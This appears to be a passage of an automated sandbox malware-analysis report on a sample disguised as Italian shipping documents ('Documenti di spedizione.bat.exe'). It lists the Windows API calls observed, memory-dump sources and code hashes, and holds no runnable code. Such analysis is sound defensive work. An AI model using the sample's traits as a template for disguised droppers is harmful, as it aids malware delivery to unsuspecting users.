                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                            • String ID:
                                            • API String ID: 2547128583-0
                                            • Opcode ID: 3d400e748f947671e30b9badb510484ff95b6787d133025eb2c4a7967b05848e
                                            • Instruction ID: 9986063a3a3a914c3c9c85809e338cef1f66889ba2e3f6f8a6abe9a53671474f
                                            • Opcode Fuzzy Hash: 3d400e748f947671e30b9badb510484ff95b6787d133025eb2c4a7967b05848e
                                            • Instruction Fuzzy Hash: BAE0CD32A08111B7D650B7705D0497773AC9FC475030208BEF907F2185E738EC319769
                                            APIs
                                            • GetFileAttributesA.KERNELBASE(00000003,00402D8D,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,80000000,00000003), ref: 00405B6E
                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            • Opcode ID: 4a69860c6089f1fb7fd455c1891d9cc54c05e48a968a67635bcc5e625bd0c43f
                                            • Instruction ID: 2e597581bf20324382b204af2e2b9293bc3b27f4d9e8cb915424ec39c2be7a6e
                                            • Opcode Fuzzy Hash: 4a69860c6089f1fb7fd455c1891d9cc54c05e48a968a67635bcc5e625bd0c43f
                                            • Instruction Fuzzy Hash: A7D09E31658201EFFF098F20DD16F2EBBA2EB84B00F10962CBA92941E0D6755815DB26
                                            APIs
                                            • GetFileAttributesA.KERNELBASE(?,?,0040575D,?,?,00000000,00405940,?,?,?,?), ref: 00405B4A
                                            • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B5E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                            • Instruction ID: 899457fb2a373ec916eabf998b05f3716e4ca5246c779d0db29ba2cd27af7bf6
                                            • Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                            • Instruction Fuzzy Hash: E2D01272908521AFC6102738ED0C89BBF65EB543717058B31FDB9E22F0D7345C528AA9
                                            APIs
                                            • CreateDirectoryA.KERNELBASE(?,00000000,004032B2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 00405659
                                            • GetLastError.KERNEL32 ref: 00405667
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CreateDirectoryErrorLast
                                            • String ID:
                                            • API String ID: 1375471231-0
                                            • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                            • Instruction ID: 0da22567c4b446b4f42a21ca14333010da7ca755278e2de90fea66cf95c641d8
                                            • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                            • Instruction Fuzzy Hash: 80C04C30A19502DAD7105B31DD08F177E60EB50741F548935A10AE11F0D6769451DD3F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: wsprintf
                                            • String ID:
                                            • API String ID: 2111968516-0
                                            • Opcode ID: ba0784285b27e5103b764f78ef6fb10791d77067d667a4e03e7b1a8b22abeba3
                                            • Instruction ID: c506eed3d8509f523d62ce86bbd7ec2d7c700efff23c78fc82727488f7f797df
                                            • Opcode Fuzzy Hash: ba0784285b27e5103b764f78ef6fb10791d77067d667a4e03e7b1a8b22abeba3
                                            • Instruction Fuzzy Hash: 5A21F970D0429ABADF218FA885486AEBF749F01314F1445BFE890B63D1C1BE8A81CF59
                                            APIs
                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: FileMove
                                            • String ID:
                                            • API String ID: 3562171763-0
                                            • Opcode ID: 6a883f9504f5c2888ca71b0d8159a7984c3ca00eae0cacb2c6aae2654bc04831
                                            • Instruction ID: 5898f67605d89fe4fb30f7e570565f9f0960a3a70fe6e37fe1d860f2248c6c53
                                            • Opcode Fuzzy Hash: 6a883f9504f5c2888ca71b0d8159a7984c3ca00eae0cacb2c6aae2654bc04831
                                            • Instruction Fuzzy Hash: 2AF09635B08115A6DB20A7A54F0DD5F15649B81364B34423BF151B21D1DABD860295AF
                                            APIs
                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040232B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: PrivateProfileStringWrite
                                            • String ID:
                                            • API String ID: 390214022-0
                                            • Opcode ID: 6b5e48cc008279052f1a47b51cc32cf127a00dc2733201354761e156b3ebbbdf
                                            • Instruction ID: 5f6267e841dd840bf6295cbe1617e7a0042591bb1814ca2e8a4844537e2a2c78
                                            • Opcode Fuzzy Hash: 6b5e48cc008279052f1a47b51cc32cf127a00dc2733201354761e156b3ebbbdf
                                            • Instruction Fuzzy Hash: 67E04F31B001246BD7307AB10F8E97F10999BC4304B39153ABA01B62C6EDBC4C414AB9
                                            APIs
                                            • WriteFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,0040FE8E,0040A8D8,004031F8,0040A8D8,0040FE8E,004128D8,00004000,?,00000000,00403022,00000004), ref: 00405C25
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                            • Instruction ID: a68fbbb5dd244fa7f7e93bb3aa8c49248ed304819acaaafe9587b6e0b9a7c414
                                            • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                            • Instruction Fuzzy Hash: 59E0EC3261835EAFEF209E659C00AEB7B6CEB05361F048836FD15E2150D271E8219BA9
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(00000000,00000496,00000000,00000022,00000000,?,?), ref: 00402C00
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
                                            • Instruction ID: e7f2061ded5818062db825bc0413707355dbbb7a887edde82a058a89c260750b
                                            • Opcode Fuzzy Hash: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
                                            • Instruction Fuzzy Hash: 5EE046B6250108BADB00EFA4EE4AFA537ECAB44700F008021B608E60A1C678E6108B79
                                            APIs
                                            • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128D8,0040A8D8,00403274,00409130,00409130,00403178,004128D8,00004000,?,00000000,00403022), ref: 00405BF6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
                                            • Instruction ID: ff987474db4941a2a63fe891919fb2946ba1e32a0df937fa27738628adbeee07
                                            • Opcode Fuzzy Hash: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
                                            • Instruction Fuzzy Hash: 5EE0EC3261835AABEF509E559C04EEB7B6CFB05360F045432FD15E2190D275E8219BA5
                                            APIs
                                            • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2629006314.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2628993182.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2629018868.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2629030864.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                            • Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
                                            • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                            • Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
                                            APIs
                                            • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402369
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: PrivateProfileString
                                            • String ID:
                                            • API String ID: 1096422788-0
                                            • Opcode ID: 90e07bb3a0b3f4804eab7f86ac5a4e71b50077df0b3d61eb17d11243db03f5ce
                                            • Instruction ID: 863d308e192ce4c0f66b0ae01519e0470cfafd3cecd099ef988cf845eccf6abb
                                            • Opcode Fuzzy Hash: 90e07bb3a0b3f4804eab7f86ac5a4e71b50077df0b3d61eb17d11243db03f5ce
                                            • Instruction Fuzzy Hash: D1E08630A04208BADB10AFA08F09EAD3A79AF41710F24003AF9507B0D1EAB84481DB2D
                                            APIs
                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 96c910dea8fbf951c2b9a4b5f3b3c3063cfa5e5189f353d5a1020b82a892de8f
                                            • Instruction ID: bac0d5995861a33a007bf1aced2086678d13136d77447ce7e9e78d56ca3cc0cd
                                            • Opcode Fuzzy Hash: 96c910dea8fbf951c2b9a4b5f3b3c3063cfa5e5189f353d5a1020b82a892de8f
                                            • Instruction Fuzzy Hash: DCD05BB2704115EBCB10DFE5EB0869D77B0DB40365F304137D151F21D0D2BADA559759
                                            APIs
                                            • SendMessageA.USER32(0001048C,00000000,00000000,00000000), ref: 0040413A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
                                            • Instruction ID: 75e74fd11ebe5bc6c3f22cf38e5f61c8940f983f04da59faa373adfcae7f6129
                                            • Opcode Fuzzy Hash: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
                                            • Instruction Fuzzy Hash: 82C04C717442017AEA218B519D49F0677586794700F6544257320A60D0C6B4E450E62D
                                            APIs
                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F75,?), ref: 00403285
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                            • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                            • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                            • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                            APIs
                                            • SendMessageA.USER32(00000028,?,00000001,00403F42), ref: 0040411F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
                                            • Instruction ID: a78b9239c319e9cb66b61a8ea9955aebbc10e43728856a3b978814f56e37e297
                                            • Opcode Fuzzy Hash: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
                                            • Instruction Fuzzy Hash: 19B092B6684200BAEE228B00DD09F457AB2E7A8742F008024B200240B0CAB200A1DB19
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,00403EDB), ref: 00404108
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
                                            • Instruction ID: 4b90da896e4fa09681504a9dabf2ba00c57f91177066947fb67d52e8ca440c18
                                            • Opcode Fuzzy Hash: 14a97dc87043aa2e894c667cdbf79e2d841fd90f9686f850a1099e45bc3f86c8
                                            • Instruction Fuzzy Hash: FCA012324040009BCB014B90FE04C457F31A754300701C031E10180030C2310824FF09
